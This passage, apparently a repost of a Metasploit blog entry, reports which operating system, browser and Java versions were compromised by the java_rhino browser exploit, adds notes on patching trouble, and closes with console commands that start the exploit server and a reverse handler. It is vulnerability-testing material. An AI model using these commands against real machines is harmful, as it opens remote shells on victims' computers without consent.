http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395 .html - However, even after following these instructions, i was unable to get this process to work, and simply disabled java on the vulnerable device. Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not, however, when i went to disable the plugin, i noticed that the 'update' button lead me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime. Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) SESSION CREATED - no package available in the repositories Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories Ubuntu 11.10 x64 / Chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin [h=4]Apple OS X:[/h] Interesting issue here, I was forced to update, restart, then update again to get the updated sun java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus, a second update was required to get the latest java package. To be fair, this system wasn't updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete. Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11 OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11 OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11 [h=3]Testing for the java_rhino vulnerability: [/h] You can test this exploit in your own environment with the (framework) instructions below. We are currently prepping our weekly update for our commercial customers, it will be available in the Pro / Express / Community product later today. msf exploit(handler) > use exploit/multi/browser/java_rhino msf exploit(java_rhino) > info msf exploit(java_rhino) > set URIPATH xxxx msf exploit(java_rhino) > exploit [*] Exploit running as background job. [*] Started reverse handler on 10.0.0.11:4444 [*] Using URL: hxxp://0.0.0.0:8080/xxxx [*] Local IP: hxxp://10.0.0.11:8080/xxxx [*] Server started. Point vulnerable systems at the URL, and wait for your sessions. Sursa: https://community.rapid7.com/community/metasploit/blog/2011/11/30/test-results-for-javarhino